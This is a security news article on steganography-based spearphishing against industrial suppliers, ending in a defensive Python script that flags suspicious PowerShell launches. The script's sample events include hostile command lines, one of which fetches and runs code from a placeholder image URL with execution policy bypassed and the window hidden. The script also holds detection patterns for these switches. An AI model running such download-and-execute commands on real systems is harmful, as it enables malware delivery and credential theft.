Recently, researchers revealed that hackers are targeting industrial organizations using steganographic techniques. With the aim of stealing employee credentials, the attackers are singling out organizations in the industrial sector and hitting them with sophisticated, highly targeted attacks.
According to Kaspersky’s ICS CERT team, the attackers went after industrial suppliers in Japan, Italy, the UK, and Germany in highly targeted attacks. The attacks began with spearphishing emails carrying Microsoft Office documents whose malicious macros executed PowerShell scripts. The scripts then relied on steganography, hiding the payload inside ordinary image files, to dodge the detection and control tools that would otherwise block a malicious download.
The attackers wrote the messages and documents in the specific languages of their targets, which reflects their knowledge of the targets’ geographical locations. The purpose of the initial PowerShell script is to download an image from a randomly chosen address on the Imgur or Imgbox hosting services and extract the payload from it.
The payload concealed in the image is encoded with Base64, encrypted with RSA, and encoded with Base64 again. An intentional error in the script raises an exception whose message serves as the decryption key, and that message depends on the language of the target’s operating system. The data hidden in the images decrypts to another PowerShell script, which turns out to be a variant of Mimikatz, the open-source tool for harvesting access credentials on Windows.
For the attack to succeed, the language of the email must match the localization of the target’s operating system. In the case of an attack on a Japanese company, for instance, the text of the email and the attached Microsoft Office document with the malicious macro had to be written in Japanese, and the encrypted malware module could only be decrypted when the OS had a Japanese localization as well.
Recipients who follow the request to urgently enable the document’s active content will see no indication that anything is amiss. Behind the scenes, however, the macro launches a PowerShell script that conceals itself using the following command-line parameters:
• ExecutionPolicy ByPass, which overrides the organization’s script execution policy,
• WindowStyle Hidden, which hides the PowerShell window,
• NoProfile, which runs the script without loading the end user’s profile configuration.
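The three parameters above, combined with a download from a public image host, are exactly the kind of process-creation telemetry a defender can alert on. The following script is an added example and is not part of the original article or of Kaspersky’s research: it inspects constructed process-creation records (the field names `pid`, `parent` and `cmd`, the sample command lines and the placeholder image URLs are all assumptions made for this example) and flags PowerShell launches that use bypass, hidden-window and no-profile switches, including their short aliases, that reach out to Imgur or Imgbox, or that are spawned by an Office application.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (not taken from the article).
# The first and third mimic the macro-launched download described above;
# the second is a benign administrative use of -NoProfile; the fourth is noise.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "WINWORD.EXE",
     "cmd": "powershell.exe -ExecutionPolicy ByPass -WindowStyle Hidden -NoProfile "
            "-Command \"IEX (New-Object Net.WebClient).DownloadString('https://i.imgur.com/EXAMPLE.png')\""},
    {"pid": 4131, "parent": "explorer.exe",
     "cmd": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"pid": 4150, "parent": "EXCEL.EXE",
     "cmd": "powershell.exe -w hidden -ep bypass -nop -c \"Start-BitsTransfer https://imgbox.com/EXAMPLE\""},
    {"pid": 4162, "parent": "svchost.exe",
     "cmd": "C:\\Windows\\System32\\notepad.exe"},
]

# PowerShell accepts unambiguous prefixes of parameter names, so each pattern
# matches the full name as well as common abbreviations (-ep, -w, -nop).
INDICATORS = {
    "exec_policy_bypass":  re.compile(r"-(?:ep|ex\w*)\s+bypass", re.I),
    "hidden_window":       re.compile(r"-w\w*\s+hidden", re.I),
    "no_profile":          re.compile(r"-nop\w*", re.I),
    "image_host_download": re.compile(r"https?://[\w.-]*\b(?:imgur|imgbox)\.com", re.I),
}

# Office applications that should rarely, if ever, spawn PowerShell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}


@dataclass
class Finding:
    pid: int
    indicators: list
    severity: str


def is_powershell(cmd: str) -> bool:
    """True when the first token of the command line is a PowerShell binary."""
    tokens = cmd.strip().strip('"').split()
    if not tokens:
        return False
    exe = tokens[0].lower()
    return exe.endswith("powershell.exe") or exe.endswith("pwsh.exe")


def inspect_event(event: dict):
    """Return a Finding for a suspicious PowerShell launch, or None."""
    cmd = event["cmd"]
    if not is_powershell(cmd):
        return None
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    if event["parent"].lower() in OFFICE_PARENTS:
        hits.append("office_parent")
    if not hits:
        return None

    # All three stealth switches together are the signature from the article;
    # pairing them with an image-host download or an Office parent is high severity.
    stealth = {"exec_policy_bypass", "hidden_window", "no_profile"} <= set(hits)
    if stealth and ("image_host_download" in hits or "office_parent" in hits):
        severity = "high"
    elif stealth or "image_host_download" in hits:
        severity = "medium"
    else:
        severity = "low"
    return Finding(event["pid"], hits, severity)


def analyze(events: list) -> list:
    """Run inspect_event over a batch of process-creation records."""
    return [f for f in map(inspect_event, events) if f is not None]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"pid={finding.pid} severity={finding.severity} indicators={finding.indicators}")
```

The benign backup script still produces a low-severity finding because `-NoProfile` on its own is common in legitimate automation; the severity tiers exist so that analysts can tune alerting on the combination of switches, the download source and the parent process rather than on any single parameter.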
In August 2019, Trend Micro observed a LokiBot variant using steganography when it alerted a Southeast Asian company about a possible threat. The company received an email enclosing an attachment allegedly from an Indian confectionery company.
In 2019, the UK-based security firm Sophos discovered a botnet, dubbed MyKingz, that used steganography to conceal a malicious .exe file inside an image of pop singer Taylor Swift. Also in 2019, a security researcher from Bromium discovered ransomware embedded in a downloadable Super Mario image. Using steganography, the hackers sent emails with attached spreadsheets that carried both the malware and an embedded macro.
By combining steganography with public image hosting services, threat actors can slip past network security solutions and let their payload go undetected, while the custom exception message defeats automated analysis of the malware. Defending against steganographic attacks begins with blocking the initial access: training employees to recognize suspicious messages shields the attack vector these campaigns rely on and is an essential step toward a stronger security posture.